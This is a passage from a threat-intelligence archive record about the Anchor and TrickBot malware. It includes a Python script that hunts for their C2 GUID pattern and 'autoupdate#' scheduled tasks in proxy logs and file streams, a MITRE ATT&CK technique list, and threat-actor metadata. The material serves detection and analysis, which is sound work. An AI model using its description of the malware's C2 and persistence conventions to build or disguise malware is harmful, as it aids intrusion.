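Two artifacts described above are stable enough to match on: the C2 GUID pattern [Machine_NAME]_[Windows_Version].[Client_ID] shared by Anchor, Anchor_DNS and TrickBot (under “GUID Generation Function”), and the “[folder] autoupdate#[number]” scheduled task created by Anchor_DNS’s -i flag. The following Python script is an added example, not code from the Cybereason post or from the malware; it parses the GUID out of URI paths and out of $GUID stream contents (cleartext for Anchor, Base64 for Anchor_DNS), groups the client IDs seen in a constructed proxy log by the hosts they were sent to, and matches the task-name convention. The proxy log format and the c2-*.invalid host names are constructed for the example; the GUID values are the ones quoted in the post.

```python
# Added example (not from the Cybereason post, not malware code): match the
# TrickBot-style C2 GUID, <tag>/<MACHINE_NAME>_<WINDOWS_VERSION>.<CLIENT_ID>,
# in URI paths and in $GUID stream contents, and the '<folder> autoupdate#<n>'
# scheduled-task name written by Anchor_DNS. The proxy log format and the
# *.invalid host names are constructed; the GUID values are those quoted in
# the post.
import base64
import binascii
import re
from collections import defaultdict

# W followed by the version digits (W617601 for 6.1.7601, W10017134 for
# 10.0.17134), then a dot and a 32-hex-digit client ID.
GUID_PATH = re.compile(
    r'/(?P<tag>[A-Za-z0-9_]+)/(?P<machine>[A-Za-z0-9-]+)_(?P<winver>W\d{5,9})'
    r'\.(?P<client_id>[0-9A-Fa-f]{32})(?=/|$)'
)
TASK_NAME = re.compile(r'^(?P<folder>\S.*?) autoupdate#(?P<number>\d+)$')

def parse_guid(text):
    """Return the tag, machine, winver and client_id fields if the GUID
    pattern is present in text, else None."""
    m = GUID_PATH.search(text)
    return m.groupdict() if m else None

def parse_ads_guid(stream):
    """Anchor stores its $GUID stream in cleartext and Anchor_DNS in Base64:
    try the cleartext form first, then a strict Base64 decode."""
    text = stream.decode('ascii', errors='replace').strip()
    found = parse_guid(text)
    if found:
        return found
    try:
        decoded = base64.b64decode(text, validate=True).decode('ascii', errors='replace')
    except (binascii.Error, ValueError):
        return None
    return parse_guid(decoded)

def is_anchor_task_name(name):
    """True for names such as 'Notepad++ autoupdate#94654'."""
    return TASK_NAME.match(name) is not None

def hunt_proxy_log(lines):
    """lines are 'client_ip host path'. Returns client_id -> sorted hosts, so a
    bot ID posted to more than one host exposes shared C2 infrastructure."""
    seen = defaultdict(set)
    for line in lines:
        parts = line.split(' ', 2)
        if len(parts) != 3:
            continue
        _, host, path = parts
        g = parse_guid(path)
        if g:
            seen[g['client_id'].upper()].add(host)
    return {cid: sorted(hosts) for cid, hosts in seen.items()}

SAMPLE_PROXY = [  # constructed log lines
    '10.0.0.5 c2-a.invalid /anchor001/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26',
    '10.0.0.5 c2-b.invalid /mor49/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26/',
    '10.0.0.9 c2-a.invalid /anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/',
    '10.0.0.7 www.example.com /images/logo_W617601.png',
]
# What an Anchor_DNS $GUID stream would hold for the MACHINE-001 example: the
# same path, Base64-encoded (constructed here from the value in the post).
SAMPLE_ADS_ANCHOR_DNS = base64.b64encode(
    b'/anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/')

if __name__ == '__main__':
    print(hunt_proxy_log(SAMPLE_PROXY))
    print(parse_ads_guid(SAMPLE_ADS_ANCHOR_DNS))
    print(is_anchor_task_name('Notepad++ autoupdate#94654'))
```

Grouping by client ID is the network-side counterpart of the overlap noted under “Shared C2 Infrastructure”: the same bot ID posted to two different hosts in the sample shows them serving the same infection. The Windows version token is matched loosely (W followed by five to nine digits) so that both the 6.1.7601 and 10.0.17134 forms quoted in the post are accepted.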
\r\nIndicators of Compromise\r\nFor a comprehensive list of indicators of compromise, please see the PDF file for this attack here.\r\nMITRE ATT\u0026CK Techniques\r\nInitial Access: Spearphishing Link\r\nExecution: User Execution, Scheduled Task, Execution through API, Command-Line Interface, PowerShell, Rundll32, Scripting, Windows Management Instrumentation, Execution through Module Load\r\nPersistence: Scheduled Task, Browser Extensions, Process Injection\r\nPrivilege Escalation: Scheduled Task, Bypass User Account Control, Access Token Manipulation\r\nDefense Evasion: Modify Registry, Code Signing, Process Injection, Deobfuscate/Decode Files or Information, Bypass User Account Control, Masquerading, NTFS File Attributes, Access Token Manipulation\r\nCredential Access: Credentials from Web Browsers, Brute Force, Private Keys, Credential Dumping\r\nDiscovery: Query Registry, System Information Discovery, Permission Groups Discovery, Account Discovery, Domain Trust Discovery\r\nCollection: Clipboard Data\r\nExfiltration: Exfiltration Over Alternative Protocol\r\nSource: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware"
	],
	"report_names": [
		"dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434597,
	"ts_updated_at": 1775792033,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a2da9ba5a5a893a9823c509fb180b1f98e65b4e2.pdf",
		"text": "https://archive.orkl.eu/a2da9ba5a5a893a9823c509fb180b1f98e65b4e2.txt",
		"img": "https://archive.orkl.eu/a2da9ba5a5a893a9823c509fb180b1f98e65b4e2.jpg"
	}
}